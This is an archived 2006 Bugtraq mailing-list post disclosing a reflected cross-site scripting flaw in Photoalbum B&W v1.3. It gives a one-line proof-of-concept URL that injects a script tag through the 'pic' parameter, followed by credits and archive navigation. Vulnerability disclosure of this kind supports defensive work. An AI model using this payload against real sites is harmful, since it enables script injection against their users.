Xss exploit in Photoalbum B&W v1.3

---

• From: black-cod3@xxxxxxxxxxx
• Date: 28 May 2006 22:04:04 -0000

---

Xss exploit in Photoalbum B&W v1.3

forum type : Photoalbum B&W v1.3
bug found by : black-code & sweet-devil
team : site-down
type : Xss

####################################################
exploit :


http://www.example.com/superalbum/index.php?pic='><script>alert(10)</script>

####################################################

path to admin login:

#######################
emails:

black-cod3@xxxxxxxxxxx & gamr-14@xxxxxxxxxxx
#######################


All my respect to our friends , lezr.com , g123g.net


done .. peace

---

• Prev by Date: VARIOMAT(advanced cms tool)SQL injection/XSS
• Next by Date: [KAPDA::#45] - geeklog multiple vulnerabilities
• Previous by thread: VARIOMAT(advanced cms tool)SQL injection/XSS
• Next by thread: [KAPDA::#45] - geeklog multiple vulnerabilities
• Index(es):
  • Date
  • Thread

---

Relevant Pages Xss exploit in Chipmunk directory ... Xss exploit in Chipmunk directory ... forum type: Chipmunk directory ... bug found by: black-code ... (Bugtraq) Xss exploit in Chipmunk guestbook ... Xss exploit in Chipmunk guestbook ... forum type: Chipmunk guestbook ... bug found by: black-code ... (Bugtraq)

---

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > bugtraq  > 2006-05